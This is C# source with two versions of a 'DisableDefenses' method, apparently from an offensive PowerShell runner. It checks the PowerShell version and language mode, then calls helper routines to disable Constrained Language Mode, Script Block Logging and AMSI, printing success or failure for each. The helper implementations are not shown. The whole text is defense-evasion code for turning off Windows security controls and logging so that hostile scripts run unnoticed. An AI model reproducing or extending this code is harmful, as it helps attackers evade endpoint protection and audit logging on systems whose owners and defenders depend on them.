private static bool DisableDefenses(PowerShell rs, CustomPSHost host)
{
bool ret = true;
ret &= DisableClm.DoDisable(rs);
string l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true);
Info($"[.] Language Mode: {l}");
if (ret && String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
{
Info("[+] Constrained Language Mode Disabled.");
}
else
{
Info("[-] Constrained Language Mode not disabled.");
}
if ((ret &= DisableScriptLogging(rs)))
{
Info("[+] Script Block Logging Disabled.");
}
else
{
Info("[-] Script Block Logging not disabled.");
}
if ((ret &= DisableAmsi(rs)))
{
Info("[+] AMSI Disabled.");
}
else
{
Info("[-] AMSI not disabled.");
}
return(ret);
}
private static bool DisableDefenses(PowerShell rs, CustomPSHost host)
{
bool ret = true;
string l = ExecuteCommand("'{0}.{1}' -f $PSVersionTable.PSVersion.Major, $PSVersionTable.PSVersion.Minor", rs, host, true, true).Trim();
float psversion = 5;
try
{
System.Globalization.CultureInfo customCulture = (System.Globalization.CultureInfo)System.Threading.Thread.CurrentThread.CurrentCulture.Clone();
customCulture.NumberFormat.NumberDecimalSeparator = ".";
System.Threading.Thread.CurrentThread.CurrentCulture = customCulture;
psversion = float.Parse(l, System.Globalization.CultureInfo.InvariantCulture);
}
catch (FormatException e)
{
Info($"[-] Could not obtain Powershell's version. Assuming 5.0 (exception: {e}");
}
if (psversion < 5.0 && !ProgramOptions.Force)
{
Info("[+] Powershell version is below 5, so AMSI, CLM, SBL are not available anyway :-)");
Info("Skipping bypass procedures...");
return(ret);
}
else
{
Info($"[.] Powershell's version: {psversion}");
}
l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true, true).Trim();
Info($"[.] Language Mode: {l}");
if (!String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
{
DisableClm.DoDisable(rs, host, ProgramOptions.Verbose);
CleanupNeeded = true;
l = ExecuteCommand("$ExecutionContext.SessionState.LanguageMode", rs, host, true, true).Trim();
Info($"[.] Language Mode after attempting to disable CLM: {l}");
if (String.Equals(l, "FullLanguage", StringComparison.CurrentCultureIgnoreCase))
{
Info("[+] Constrained Language Mode Disabled.");
ret &= true;
}
else
{
Info("[-] Constrained Language Mode not disabled.");
ret &= false;
}
}
else
{
Info("[+] No need to disable Constrained Language Mode. Already in FullLanguage.");
}
if ((ret &= DisableScriptLogging(rs)))
{
Info("[+] Script Block Logging Disabled.");
}
else
{
Info("[-] Script Block Logging not disabled.");
}
if ((ret &= DisableAmsi(rs)))
{
Info("[+] AMSI Disabled.");
}
else
{
Info("[-] AMSI not disabled.");
}
Info("");
return(ret);
}
